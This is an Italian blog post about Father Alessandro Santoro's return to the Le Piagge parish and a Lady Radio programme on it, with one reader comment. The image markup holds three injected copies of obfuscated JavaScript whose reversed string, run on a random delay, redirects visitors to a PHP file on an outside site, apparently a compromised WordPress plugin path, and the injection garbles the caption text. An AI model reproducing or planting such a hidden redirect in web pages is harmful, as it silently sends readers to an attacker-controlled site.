13 dicembre 2018

Alessandro Santoro alle Piagge, il giorno dopo. Il dibattito su Lady Radio

image_pdfimage_print
) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andro di nuovo tra noi”]$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/04/ritornoalepiagge.jpg”>25 aprile 2010. Aless<script type=$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andro di nuovo tra noi” width=”300″ height=”225″ />

L’emittente radiofonica fiorentina Lady Radio ha dedicato la sua trasmissione di approfondimento al ritorno di Alessandro Santoro alle Piagge. Qui potete scaricare e ascoltare la trasmissione in formato mp3. In studio il giornalista Francesco Pini, | seconda | terza | quarta parte. Ascoltale direttamente cliccandoci sopra, oppure scaricale sul computer o sul tuo lettore mp3 cliccando sul link con il tasto destro del mouse e poi su “salva destinazione con nome” . La durata complessiva è di circa 40 minuti.

0 Comments

  1. Giancarlo Zani

    Sono stato alla messa di don Santoro per il suo ritorno alle Piagge, è stato un momento veramente commovente, li alla messa si capiva il significato che dovrebbe avere il Vangelo . Un atto d’amore rivolto a tutti gli uomini.
    Credo anche che il ritorno di don Santoro possa essere, per la chiesa fiorentina, un iniziale cambiamento di rotta e forse capire che la parola di Gesù è fatta per gli uomini e non per le regole.

    Reply

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *